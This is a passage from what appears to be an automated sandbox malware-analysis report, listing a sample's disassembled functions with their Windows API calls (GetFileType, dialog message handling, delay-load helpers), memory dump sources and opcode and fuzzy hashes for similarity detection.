                                    • Instruction Fuzzy Hash: 8AD0C73065820DFADF46BA759C02F7A7BFDDB00351F104567BC088A161ED71DF14A661
                                    Function 00349989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileType.KERNELBASE(000000FF,00349887), ref: 00349995
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileType
                                    • String ID:
                                    • API String ID: 3081899298-0
                                    • Opcode ID: 7c2a699d3aa0564207a339baa182c7e9eee3c87dde15f25deb9a09c9f3b70e40
                                    • Instruction ID: dbaf1a260c34fb7ad96ab5881f40514a3bce9c7158d4a6a579bae56981c058c0
                                    • Opcode Fuzzy Hash: 7c2a699d3aa0564207a339baa182c7e9eee3c87dde15f25deb9a09c9f3b70e40
                                    • Instruction Fuzzy Hash: 02D01231011180958F3746344D0929B7795DB83366B39C6ADD065C80A1D733D843F542
                                    Function 0035D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0035D43F
                                      • Part of subcall function 0035AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035AC85
                                      • Part of subcall function 0035AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035AC96
                                      • Part of subcall function 0035AC74: IsDialogMessageW.USER32(00010420,?), ref: 0035ACAA
                                      • Part of subcall function 0035AC74: TranslateMessage.USER32(?), ref: 0035ACB8
                                      • Part of subcall function 0035AC74: DispatchMessageW.USER32(?), ref: 0035ACC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                    • String ID:
                                    • API String ID: 897784432-0
                                    • Opcode ID: b88669b4a24f99bd848926ed7d1d0a042bfd28aaebd5c962949475169cbef8a8
                                    • Instruction ID: ddcf35b4a51c2df648ccb6e2cdfdb70be0de14e1c3b0f61d4d4a461a3f3ce9a2
                                    • Opcode Fuzzy Hash: b88669b4a24f99bd848926ed7d1d0a042bfd28aaebd5c962949475169cbef8a8
                                    • Instruction Fuzzy Hash: 17D09E72144300ABDA132B51CE06F0F7AE6AB88B05F404694B744790B18A62AD20AB16
                                    Function 0035E1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035E20B
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 5cb2d71ea42b0a6c5445985c78c5ded1e2eeb3e4a4385ad659b5ac2b0c0b128a
                                    • Instruction ID: 31174bb34d3ee759535bf1c2dbfe7ff74b4cf9c93139a338e7391360849fc854
                                    • Opcode Fuzzy Hash: 5cb2d71ea42b0a6c5445985c78c5ded1e2eeb3e4a4385ad659b5ac2b0c0b128a
                                    • Instruction Fuzzy Hash: 00B0129526E001FD721FA204BD06D77032CC4C0B53330C41AFD09D849095404D0D4432
                                    Function 0035DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: d6d3736890279e9409bb70df9771dd1892aff9edc2d66df02d4f05074351ad76
                                    • Instruction ID: dbf5f32e8bfc15c9728cd2a18f7507689bb0f3501c9e880427e21bb5ad972a66
                                    • Opcode Fuzzy Hash: d6d3736890279e9409bb70df9771dd1892aff9edc2d66df02d4f05074351ad76
                                    • Instruction Fuzzy Hash: D5B012D526C001AD313BF219AC06F3F035CC0C4B12330C51BFC0DC4458D4444C0D4831
                                    Function 0035DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: c7bb7a6067fc3c09d5ae712dad14b5ba798dd954072e3dd542be810184f2bec7
                                    • Instruction ID: 39c6efa5b1828c982713c527aa97556ff7654a9b7af161a61a9a298ed16b20d8
                                    • Opcode Fuzzy Hash: c7bb7a6067fc3c09d5ae712dad14b5ba798dd954072e3dd542be810184f2bec7
                                    • Instruction Fuzzy Hash: D3B012A526C001ED313BF219AC06E3B025CC0C0B12330C11BFC0DC4068D4484C0C4831
                                    Function 0035DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: df713ea34e158e556e245eba26aba4b656f5864d06518b940d1548d54b9e5f64
                                    • Instruction ID: 442cf725f8b34852d8a0f33dec130aff59cdfa2293572821bb78efc0784523e2
                                    • Opcode Fuzzy Hash: df713ea34e158e556e245eba26aba4b656f5864d06518b940d1548d54b9e5f64
                                    • Instruction Fuzzy Hash: 02B012952AC101AD713BF219AC06F3B025CD0C0B12330811BFC0DC4458D4884C0C4931
                                    Function 0035DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 791e209669c33e994573afb1a66edc39ceee931d6332a692e38e35d90b37490b
                                    • Instruction ID: 66e43dccc59aa57981d16f0537968c3a4c8fa2e6e1c73dcdbf50c720ede3a659
                                    • Opcode Fuzzy Hash: 791e209669c33e994573afb1a66edc39ceee931d6332a692e38e35d90b37490b
                                    • Instruction Fuzzy Hash: D2B0129936C003AD312F92187D07E77022CC0C0B12330C01AFD0DC4660D9404C0D8531
                                    Function 0035DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 4cab0bffcd8763ec1ee04cbf31dd9a9090ed5157682a6cce092765c619fb3835
                                    • Instruction ID: 7477299aef7e1038a0f0808c0383e00f87150669a425520f0168dbee81f5d37a
                                    • Opcode Fuzzy Hash: 4cab0bffcd8763ec1ee04cbf31dd9a9090ed5157682a6cce092765c619fb3835
                                    • Instruction Fuzzy Hash: 9AB0129A36C003ED312F92087C07E77023CC0C0B12331C01AFC0DC5660D9404C0C8531
                                    Function 0035DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 084755e297e59690cde243513d4724c610603737a462b213b23e6f00bda91207
                                    • Instruction ID: 2a3326be83322b4472e963324d65a56e4120a721112644eeb067a5dd0c6c1f46
                                    • Opcode Fuzzy Hash: 084755e297e59690cde243513d4724c610603737a462b213b23e6f00bda91207
                                    • Instruction Fuzzy Hash: 17B0129936C002AD312B91597C07F77022DD0C0B12330802AF80EC4E60D9404C0C8531
                                    Function 0035DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 39c7aebc3b38e15f816bbbb54f6d9da6e9522829b2d279ea6ae2eb37640cd0d1
                                    • Instruction ID: ce68056b5e34408a4a90468a03aec2aa2ff8f75564b01cfd96fe3323b8c532b0
                                    • Opcode Fuzzy Hash: 39c7aebc3b38e15f816bbbb54f6d9da6e9522829b2d279ea6ae2eb37640cd0d1
                                    • Instruction Fuzzy Hash: 09B0129937C107BD322B52047C07D77022CC0C0B12330812AFC09D456099404C4C8431
                                    Function 0035DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 72d72cba2b937777bb34561c8692252fbf5cff5388666f1676fa97fda06fcf4c
                                    • Instruction ID: 4191e25ede10cf8c6877219d115746d14a8da07c0f59be13f5ecb20123cc3b32
                                    • Opcode Fuzzy Hash: 72d72cba2b937777bb34561c8692252fbf5cff5388666f1676fa97fda06fcf4c
                                    • Instruction Fuzzy Hash: 95B0129926C201BD312F2104BE02E77423CC1C2B12330861AF909E4470D5805C4C5831
                                    Function 0035DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: c4608c141e142c9450f9a4c797568bd7e6f55f48675a556755ffde72e18c0c76
                                    • Instruction ID: 0fa1d7558c969adf4e42cf5dcd8c4f95cf88b177f0fadaed85931baa3a3db2b3
                                    • Opcode Fuzzy Hash: c4608c141e142c9450f9a4c797568bd7e6f55f48675a556755ffde72e18c0c76
                                    • Instruction Fuzzy Hash: 00B0129926C101AD312F6108BC02F77023CC0C7B12330C51AFD0DD4570D5805C0D4931
                                    Function 0035DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: fe3a80fc13cc1b9463ea2691bdf4a6fff8e8ac1af5cc06467919d32904c6d1de
                                    • Instruction ID: 46549fbc83951dae432dc800f4f9bc1db5cd5532a34506e11c8a00b59d7825dd
                                    • Opcode Fuzzy Hash: fe3a80fc13cc1b9463ea2691bdf4a6fff8e8ac1af5cc06467919d32904c6d1de
                                    • Instruction Fuzzy Hash: 9BB0129927C201AD312F6108BC02F77023CC0C2B12330851BF90DD4970D5805C0C4931
                                    Function 0035DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 7f6bf83a898f4337b6076eed1b5319a74dc2f0ed95bea24bc9fd38ba04f98c49
                                    • Instruction ID: 9021cfe8f4baf58ae9240774a9415a8427b1ebd32825ab4b71c8361e173cb8d1
                                    • Opcode Fuzzy Hash: 7f6bf83a898f4337b6076eed1b5319a74dc2f0ed95bea24bc9fd38ba04f98c49
                                    • Instruction Fuzzy Hash: CBA0029526D5417D717AB651ED16D7B425CD4D0B13330851AFC0A944595544584D5831
                                    Function 0035DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: bebb26f0b1eab916030fd0f97b308887a429e10fb5efe028d35538ed58529226
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: bebb26f0b1eab916030fd0f97b308887a429e10fb5efe028d35538ed58529226
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    Function 0035DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
